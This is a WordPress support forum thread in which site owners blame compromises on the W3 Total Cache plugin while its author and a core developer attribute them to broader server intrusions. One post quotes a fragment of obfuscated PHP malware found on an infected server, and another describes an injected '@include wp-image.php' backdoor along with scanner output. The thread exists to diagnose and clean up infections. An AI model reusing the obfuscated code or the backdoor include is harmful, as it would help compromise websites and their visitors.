W3 Total Cache
[resolved] [closed] W3 total cache and security (30 posts)

  1. lekiend
    Posted 3 years ago #

    Do someone knows if there is a security hole in W3tc ?
    My website have been hacked and the malicious software was located in the W3tc cache directory.

    I deactivated and deleted the plugin and I do not have any hacking anymore.

    Thanks for your help.



  2. lekiend
    Posted 3 years ago #

    I'm sure 100% that W3 total cache is not secure.
    I deactivate it and delete all the files from my website and I didn't have any attack anymore. I reactivated yesterday and few hours after, malicious files were in the W3tc cache directory again.

    Please correct that.


  3. harikaram
    Posted 3 years ago #

    Hi. This is concerning, as is the lack of response. Have you or can you try hardening the folder with htaccess? Something like:

    RewriteRule ^wp-content/wp-plugins/w3-total-cache/[^/]+\.php$ - [F,L]

    This would rule out the possibility that the vulnerability is a dodgy script, though the injection may still come via a carefully crafted query string or something similar.

    Also, does the vuln occur when the plugin is disabled but NOT deleted?

    What's in the actual dodgy files? What are they named?

  4. lekiend
    Posted 3 years ago #

    Thanks for your answer.
    Sorry but I deactivated and delete W3tc totally from my website. I can not test anymore.
    In fact, it is too dangerous because those malicious files are used for fishing banking companies.

    Malicious files were named like indentification.007.php and more...


  5. infopage
    Posted 3 years ago #

    This is interesting considering a couple of days ago my site got blocked by HostGator for going over cpu space so they told me to install W3tc instead of WP Supercache and when I made the switch my account was instantly restored.

    I wrote about it here: Forbidden Error Tells Which Cache Plugin Is Better

    Now I haven't noticed any malicious files;however, I should add that I have Cloudfare activated as well for extra security and speed..

    @lekiend, so how did you come across that attack and what types of things were happening, also what plugin or security measures did you switch to after deleting W3tc?

  6. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    Sorry I'm not clear on what exactly is the complaint or issue here. W3TC is a caching plugin if your host or other site code (theme / plugins) are insecure and your code is compromised, W3TC (if it still runs after the attack) will create cache files containing the modified pages. If you deactivate it, it will stop caching them. That's all.

    What you can do (and what hosts often do) is compare the modification dates of the original files to those on your server when unexpected behavior occurs and then you know that something has changed that was not approved. I also recommend services like VaultPress that make monitoring of these kinds of issues very easy for end users.

    Having said all of this, if someone is aware of how W3TC was used as a vector to compromise your site we would like more details.

    It should be clear that were W3TC a vector for compromising sites, the wordpress.org team would remove it from the repository if they contacted us and we were not able to work together to make an instant fix. There was a recent attempt that affected several plugins and the fantastic wordpress.org team took immediate steps. Even still that shows that quite often plugins/themes do not represent overt vectors for security issues, however we remain vigilant regardless and have rolled many security enhancements in the releases of late.

    As for hostator, we're trying to work with them to make sure that they have the necessary documentation et al to address customer needs and we hope they'll have the time to allow us to contribute.

  7. lekiend
    Posted 3 years ago #

    @frederik Townes: Hello, i do not know how hackers do but I'm sure they are able to publish files in the W3TC cache directory. Those malicious files were not present anywhere else in the server. W3TC was still working.
    Hackers do not try to crash or delete any files on my server. They are searching to use a part of my server as a fake website to fish banking companies.

    If those malicious files could help you to identify the problem, i can send them to you. I copied them in a directory outside apache repository.


  8. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    Do you use the media library on your server? They could just as easily inject viruses into your jpgs as they could modify cache files to contain whatever they want (until the cache is cleared at least).

    Anyway, what would help me identify the problem is if some file in W3TC was changed (somehow) to allow them to start modifying the cache files (if that's what you mean happened). Otherwise the permissions on your cache directory are too open (which is atypical since the owner of the cache folder should be PHP as a user).

    You need to talk to your host about the correct permissions for your media library and cache directory in order to make sure that WP works normally without making your site vulnerable.

    Does that make sense?

  9. lekiend
    Posted 3 years ago #

    I use off course jpegs on my server. I test them all with an antivirus with todays' last signatures. NO VIRUS found anywhere on my server. The only malicious files were located in the W3TC directory a few days ago. Since I remove completly W3TC plugin, no attack anymore.
    I'm sure if I reinstall and reactivate it, i will be infected a few hours later. I've tested it !
    Security on files are 755 as the plugin ask to be. I usely use 750 and I change because the plugin wants 755 and nothing else.
    They first upload a zip file into the W3TC cache directory, they uncompress it and they simply call php files with the full url to do what ever they want on the server.


  10. @lekiend Please read the security faq on the proper way to report a suspected security issue.

    Also you should be working with your hosting companies security team so that they can determine where it's coming from. Fredrick has already stated how seriously he and the core WordPress team take these issues and how quickly they react when they are discovered.

    The hack most likely was not completely cleaned. It's important that you follow the steps listed in the FAQ My site was hacked.

  11. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    @c3mdigital's right.

    You need to talk to your host about permissions because applications should be able to write to the disk without making things publicly editable. That's a hosting configuration issue as I stated previously and whoever hacked your site could have used the media library directory to do the exact same thing or your servers /tmp directory etc etc.

  12. kathywhatley
    Posted 3 years ago #

    Something is going on with my site also that involves W3TC. I think it just started yesterday. I noticed that a new author page was created yesterday that I did not do and have never heard of this person.

    This is what was created:



    Then I just noticed this morning that two more of the same type of author pages have been created:



    What is going on???? Is this something with W3TC or something else "using" W3TC?

  13. kathywhatley
    Posted 3 years ago #

    Ok, I feel kind of stupid right now. Sorry. I guess I was still half asleep this morning. I just realized that w3tc only cached the page that was obviously created somewhere else. So it has nothing to do with w3tc. It's just when I did a search with the person's name, the file cached file is the only thing that showed up.

  14. Walied
    Posted 3 years ago #

    I'm facing the same issue, spamming link such as posting in comments was posted below the header of my site, when search for them through ssh I found them in public_html/wp-content/w3tc/pgcache/6/a/c/6ac2c5172bd2c18d7c9ff26a128d6c11
    When I disable the w2tc pluging they go, when I enable it they come in the same place content/w3tc/pgcache/6/a/c/6ac2c5172bd2c18d7c9ff26a128d6c11

    when I run the exploid scanner this was the comment regarding w2tc

    Often used to execute malicious code * Javascript, and can be directly eval()'ed with no further parsing
    Used by malicious scripts to decode previously obscured data/programs $this->_accountKey = base64_decode($accountKey);
    Used by malicious scripts to decode previously obscured data/programs $this->_accountKey = base64_decode($value);
    Used by malicious scripts to decode previously obscured data/programs base64_decode((string)$xmlMessages[$i]->MessageText)
    Used by malicious scripts to decode previously obscured data/programs return base64_decode($sessionRecord->serializedData);
    Often used to execute malicious code * Javascript, and can be directly eval()'ed with no further parsing
    Often used to execute malicious code eval($evalStr);
    Often used to execute malicious code eval("\$proxy = new nusoap_proxy_$r(''
    Often used to execute malicious code ug('in invoke_method, calling function using eval()');
    Often used to execute malicious code #039;in invoke_method, calling class method using eval()');
    Often used to execute malicious code 9;in invoke_method, calling instance method using eval()');
    Often used to execute malicious code @eval($funcCall);
    Used by malicious scripts to decode previously obscured data/programs return base64_decode($value);
    Often used to execute malicious code eval($evalStr);
    Often used to execute malicious code eval("\$proxy = new nusoap_proxy_$r(''
    Used by malicious scripts to decode previously obscured data/programs return base64_decode($value);
    Often used to execute malicious code $result = eval($code);
    Often used to execute malicious code data = eval("(" + data + ")");
    Often used to execute malicious code data = eval("(" + data + ")");
    Used by malicious scripts to decode previously obscured data/programs $decoded_sig = base64_decode($signature);

    Now when you go to you wp-include there would be a file called wp-image.php that file was included in the general-template.php

    (@include “wp-image.php”;)

    Solution : delete the (@include “wp-image.php”;) . Then delete the entire wp-image.php file

    The wp-image.php is not a wp original file, it is encrypted, calles these spamms from other site and prevent to display them from regular users. I would probably got their because of w3tc pluging or any other plugin.

    I hope this is helpful for someone

  15. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    @Walied, thanks for that, but it still looks like a general compromise of your site and some information on what the vector of compromise is would be extremely helpful.

  16. lincolnthree
    Posted 3 years ago #

    Found a second file:


    Similar content:

    $hXf='VnzGEJbso'|E7mWtl;$aXZwX6I='(!DA*#@@@ '|haFE.'@3(@e"';$OKtk3Z8a='@BD!CB!@$ '.
    'A '|'PP@ F@%"!';$lkmH='TD('.DBQP.':'.SbDa9cC.'&'.CP2EPHRn.' '.vDUA.#ak7ai'.
    ' ^'|'F@'.iDTA.'@ '.QhDGrQC.'`$aT)'.GTlTZ.'&6DTx(F';$YWsaFzzmJd=CfnK.'=4'./*Xp'.
    'JedDf?kq,W*/"}6u3 /LWb]a";$wyVEpKpi1H='+U@d0"d9)#cu (0x3(o ]-, B8I"i'|#kMo8Jl'.
    'A`(J$ 1'.M8pjq.'(p NS(M")%80b:k+ ';$OSqnvUZss=#ZwumrxqUzqf6a5_mYk4F2_XSERhN0i'.
    ' '.VWTK^'OE#":=';$Dx=HTPP|HDTP;$z6nIv4u=_I&_c;$LsulQ2='?Q'^Z8;$tKIJYrYl=/*pP'.
    'j#z*/$aXZwX6I|("\$e0 Dr 4diD"|'$Ep @2 d((');$k9ULQcT2=$eN4^(' %B'|' %Z');'wX'.
    '!';$uHVWpDFE=('C]P$*t'|'f,6oTv')&$u7ZqT5q;$Q81gBBCXC=(' 2%fZ"a0$@d'|'0 "K2@'.
    'Pha ')|$OKtk3Z8a;$qJnWdJtAG6=('@t@FBDXY!'.RBBAP.'@S&XT J B@@'.PIAB5|' $]2 '.
    '&@dA$'.WNHpXD.'[4I@Z4G@@ e@J8')^$lkmH;$Afy8oAw8=$YWsaFzzmJd^$wyVEpKpi1H;'_w'.
    '8b}jXlb1?eE[j;> j+2B[kYXy:Co2LXl9JeApfyx_:_Yo =sFt4q4i$1Q';

  17. None of that is due to w3tc. Your SERVER is compromised. Talk to your host.

    lincolnthree - I deleted EIGHT of your posts about this.

    Nothing you pointed at is a problem with the plugin. That .htaccess is 100% correct and as it should be. By putting up so many posts, you're tripping the spam filter, so I need you to stop that :)

    Contact your webhost for support, and if you want to, send the info via the Support link in the plugin (go to the plugin settings page, there's a tab there for it).

  18. lincolnthree
    Posted 3 years ago #

    Hello Ipstenu,

    May I make some friendly suggestions?

    First. You obviously have several people experiencing the same problem manifesting itself in what appears to be the same way. Telling them to go somewhere else is not exactly a great response. Why not encourage them to work out the issue so that future people who stumble upon this (until now) helpful or related post, might have a chance to figure out how to fix the issue. No matter the cause.

    Second. May I suggest that instead of deleting the posts that I made in good faith, and took a good deal of time to research, that you let anyone who wishes to attempt to help with this issue do so. There was no reason to remove my content. Now people who read this will simply wonder what you deleted and have no more idea of how to get to the root cause than they did before. "Too many actually related posts in an attempt to help" does not seem to warrant being censored.

    Third. I understand that you wish to make the point that W3TC is not the source of this hack, but until you can prove that it is not, or someone can prove that something else *was*, I find your actions to be inhibiting the issue resolution process.

    Thanks for your "help." I'm sure you meant well, but that's not what it seems to have turned out to be. You deleted the most useful of my posts and left the single one that looks like it supports your perspective.


    PS. Still problem free after deleting W3TC.

  19. lekiend
    Posted 3 years ago #

    I initially start this post.

    I've deactivated and deleted the plugin from that date and curiously i do not have any problems anymore. No more Hack, no more curious files, etc...

    I remember that if I activate the plugin, I was infected less than 24 hours later.

    It was just to share.


  20. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    Are you sure you followed all of the installation instructions? Because they tell you how to close your permissions back down after the installation. There would be an enormous number of issues if this was commonplace.

  21. lekiend
    Posted 3 years ago #

    Yes, i'm sure. Sorry, but i know what i am doing. I know what security means.
    I do not trust this plugin. I saw other website infected using your plugin.
    You should really admit that you have a serious security issue and try to search and find a solution.
    With that kind of security hole, I can not believe that your plugin is still downloadable on WordPress plugins.

    Please believe users testimonials on this post.


  22. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    Who is doubting you? Why do you think I'm replying? I'm asking simple questions and you're telling me that I don't believe you. So far you have given no steps to be able to duplicate or investigate and you've told anyone that questions you that they are wrong.

    Plugins that write files or that are mis-configured can be targeted by hackers and hosts can operate their servers insecurely. I don't think I should have to make the point again, that if the issue was widespread, this post and others would be more active.

    So can you provide any useful information for finding the issue? Or are you here only to question my judgement and integrity?

    Do you know how to use git? Can you check to see what other files have been modified on your server making them inconsistent with the distributed version of WP, it's themes, plugins or any third party plugins from wordpress.org or the vendors that made them?

  23. Romsonic
    Posted 3 years ago #


    I found this topic after looking if W3 is possibly injected with code ?? I am getting these errors when running exploit scan:


    $this->_accountKey = base64_decode($accountKey);


    $this->_accountKey = base64_decode($value);




    return base64_decode($sessionRecord->serializedData);


    * Javascript, and can be directly eval()'ed with no further parsing




    return base64_decode($value);

    I found this topic after looking for

    Frederick could you please let me know if this is safe code or not?? Or is it safe to delete these lines?

  24. Frederick Townes
    Plugin Author

    Posted 3 years ago #

    That code is part of the Windows Azure distribution / library. Just like Minify or other libraries W3TC uses, it's from a 3rd party and being that it's open source, i trust that it's as secure as other code on the web.

  25. Torey Azure
    Posted 3 years ago #

    I'm beginning to point to W3TC as having caused or allowed some kind of intrusion on my site as well. I'll start from the beginning.

    Site A. This site had never had a cache plugin installed. It had been running for about 12 months and I decided to optimize and speed it up. I installed W3 total cache and went through the configuration. When I deployed, the site instantly was infected with a redirect injection.

    Site B. I actually set this site up a month or so back. Last night I decided to actually deploy the W3 plugin on this site as well. Same thing - although this one took about a minute before it was seen on the live site. Same injection code.

    Site C. Same basic story as A and B - working with W3 - instant infection and only when I am logged in an making changes to W3. Again - infection was instant while I was configuring.

    In both cases I also had FileZilla open - which I haven't ruled out as the problem. But I can say I have FileZilla open most of the day and don't see problems with sites. But.... with the combination of having FileZilla open and working with W3 causes an instant infection.

    Could it be something that gets easy access to the .htaccess file through W3 while FileZilla is open?

  26. Andrew Nacin
    Lead Developer
    Posted 3 years ago #

    We haven't seen any vulnerability reports (public or private) against W3 Total Cache.

    A number of intrusions disguise themselves as files of WordPress core, Akismet, and other plugins. Given how widely used W3 Total Cache is, it is likely being targeted in similar ways. Akismet, WordPress, and W3TC aren't necessarily the problem (and are very likely not the problem) — they are just being used as camouflage.

    I would take a much closer look at your server, and especially your access logs. (Or enlist the help of guys like Sucuri.) Once you have an entry point narrowed down, you'll have a better idea of what is really going on.

  27. Torey Azure
    Posted 3 years ago #

    I do subscribe to Sucuri and they have cleaned the site up for me. I responded to their support ticket to see if I could get a little help with the server logs or identifying an entry point.

    I'll post an update with what I find.

  28. Frederick Townes
    Plugin Author

    Posted 2 years ago #

    I'm certain that if the securi guys were seeing lots of reports related to W3TC they would notify me offline and an update would be made post-haste otherwise the WordPress.org team would pull the plugin from the repository to help the community.

  29. santy143all
    Posted 2 years ago #

    can we use this plugin as script optimiser

  30. Frederick Townes
    Plugin Author

    Posted 2 years ago #

    Yes, if I understand you correctly, that is exactly the intent.

Topic Closed

This topic has been closed to new replies.

About this Plugin

  • W3 Total Cache
  • Frequently Asked Questions
  • Support Threads
  • Reviews

About this Topic